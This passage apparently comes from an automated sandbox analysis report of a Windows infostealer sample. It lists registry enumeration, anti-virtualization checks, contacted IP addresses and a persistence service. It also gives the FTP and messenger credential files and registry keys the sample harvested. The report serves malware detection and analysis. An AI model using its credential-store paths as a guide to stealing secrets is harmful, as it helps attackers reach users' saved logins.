RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40 base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40 base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko) base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko) base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent base_handle: 0x80000002 key_handle: 0x0000031c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC base_handle: 0x80000002 key_handle: 0x0000031c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC base_handle: 0x80000002 key_handle: 0x0000030c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F} base_handle: 0x80000002 key_handle: 0x0000030c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F} base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x0000030c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip base_handle: 0x80000002 key_handle: 0x0000030c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip base_handle: 0x80000002 key_handle: 0x0000030c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip base_handle: 0x80000002 key_handle: 0x0000030c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean base_handle: 0x80000002 key_handle: 0x0000030c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	SELECT * FROM Win32_ComputerSystem

One or more of the buffers contains an embedded PE file (1 event)

buffer

Buffer with sha1: 055994b16380ded39fb5e469a484976ebf86de4c

Communicates with host for which no DNS query was performed (4 events)

host	14.227.106.38
host	165.143.163.99
host	176.113.115.21
host	176.113.115.25

Checks the CPU name from registry, possibly for anti-virtualization (2 events)

registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString
registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Installs itself for autorun at Windows startup (3 events)

reg_key	HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Edit_R_RHP.\ImagePath	reg_value	C:\Program Files (x86)\Windows Photo Viewer\ko-KR\Edit_R_RHP..exe
reg_key	HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Edit_R_RHP.\ImagePath	reg_value	C:\Program Files (x86)\Windows Photo Viewer\ko-KR\Edit_R_RHP..exe
service_name	Edit_R_RHP.	service_path	C:\Program Files (x86)\Windows Photo Viewer\ko-KR\Edit_R_RHP..exe

Attempts to disable browser security warnings (1 event)

registry

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnonZoneCrossing

Harvests credentials from local FTP client softwares (50 out of 73 events)

file	C:\Users\test22\AppData\Roaming\FlashFXP\3\Quick.dat
file	C:\Users\test22\AppData\Local\FlashFXP\4\Quick.dat
file	C:\Users\test22\AppData\Roaming\FlashFXP\4\Quick.dat
file	C:\ProgramData\FlashFXP\3\Sites.dat
file	C:\ProgramData\FlashFXP\3\History.dat
file	C:\Users\test22\AppData\Local\FlashFXP\4\History.dat
file	C:\Users\test22\AppData\Roaming\FlashFXP\3\History.dat
file	C:\Users\test22\AppData\Roaming\FlashFXP\3\Sites.dat
file	C:\ProgramData\FlashFXP\3\Quick.dat
file	C:\ProgramData\FlashFXP\4\Quick.dat
file	C:\ProgramData\FlashFXP\4\Sites.dat
file	C:\Users\test22\AppData\Roaming\FlashFXP\4\History.dat
file	C:\Users\test22\AppData\Roaming\FlashFXP\4\Sites.dat
file	C:\Users\test22\AppData\Local\FlashFXP\3\Quick.dat
file	C:\Users\test22\AppData\Local\FlashFXP\3\History.dat
file	C:\Users\test22\AppData\Local\FlashFXP\3\Sites.dat
file	C:\Users\test22\AppData\Local\FlashFXP\4\Sites.dat
file	C:\ProgramData\FlashFXP\4\History.dat
file	C:\ProgramData\VanDyke\Config\Sessions\
file	C:\Users\test22\AppData\Local\VanDyke\Config\Sessions\
file	C:\Users\test22\AppData\Roaming\VanDyke\Config\Sessions\
file	C:\Users\test22\AppData\Local\FTP Explorer\profiles.xml
file	C:\ProgramData\FTP Explorer\profiles.xml
file	C:\Users\test22\AppData\Roaming\FTP Explorer\profiles.xml
file	C:\ProgramData\SmartFTP\Favorites.dat
file	C:\Users\test22\AppData\Roaming\SmartFTP\History.dat
file	C:\Users\test22\AppData\Local\SmartFTP\History.dat
file	C:\ProgramData\SmartFTP\Client 2.0\Favorites\Favorites.dat
file	C:\ProgramData\SmartFTP\History.dat
file	C:\Users\test22\AppData\Local\SmartFTP\Client 2.0\Favorites\Favorites.dat
file	C:\Users\test22\AppData\Local\SmartFTP\Client 2.0\Favorites\
file	C:\Users\test22\AppData\Roaming\SmartFTP\Favorites.dat
file	C:\Users\test22\AppData\Local\SmartFTP\Favorites.dat
file	C:\Users\test22\AppData\Roaming\SmartFTP\Client 2.0\Favorites\
file	C:\ProgramData\SmartFTP\Client 2.0\Favorites\
file	C:\Users\test22\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Favorites.dat
file	C:\Users\test22\AppData\Roaming\TurboFTP\addrbk.dat
file	C:\Users\test22\AppData\Roaming\FTPRush\RushSite.xml
file	C:\Users\test22\wcx_ftp.ini
file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
registry	HKEY_CURRENT_USER\SOFTWARE\Far\Plugins\FTP\Hosts
registry	HKEY_CURRENT_USER\SOFTWARE\Far2\Plugins\FTP\Hosts
registry	HKEY_CURRENT_USER\Software\Far\SavedDialogHistory\FTPHost
registry	HKEY_CURRENT_USER\Software\Far2\SavedDialogHistory\FTPHost
registry	HKEY_LOCAL_MACHINE\Software\Ghisler\Windows Commander
registry	HKEY_CURRENT_USER\Software\Ghisler\Windows Commander
registry	HKEY_CURRENT_USER\Software\Ghisler\Total Commander
registry	HKEY_LOCAL_MACHINE\Software\Ghisler\Total Commander
registry	HKEY_CURRENT_USER\Software\BPFTP\Bullet Proof FTP

Harvests information related to installed instant messenger clients (9 events)

file	C:\Users\test22\AppData\Roaming\Digsby\Digsby.dat
file	C:\Users\test22\AppData\Roaming\MySpace\IM\users.txt
file	C:\Users\test22\AppData\Roaming\.purple\accounts.xml
file	C:\ProgramData\.purple\accounts.xml
file	C:\Users\test22\AppData\Local\Trillian\users\global\accounts.ini
file	C:\ProgramData\Trillian\users\global\accounts.ini
file	C:\Users\test22\AppData\Roaming\Trillian\users\global\accounts.ini
registry	HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
registry	HKEY_CURRENT_USER\Software\Paltalk

Collects information about installed applications (50 out of 249 events)

Time & API	Arguments	Status
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x0000030c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000318 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000318 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000320 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000328 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000328 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000328 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000368 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000368 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000368 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000360 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000364 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000368 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000368 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000360 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000368 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000380 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000380 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000370 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000370 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000378 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000378 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000378 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000378 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000378 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000378 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000378 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000378 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000378 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000378 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000378 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000378 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000378 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000378 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000378 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000378 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000380 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000380 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
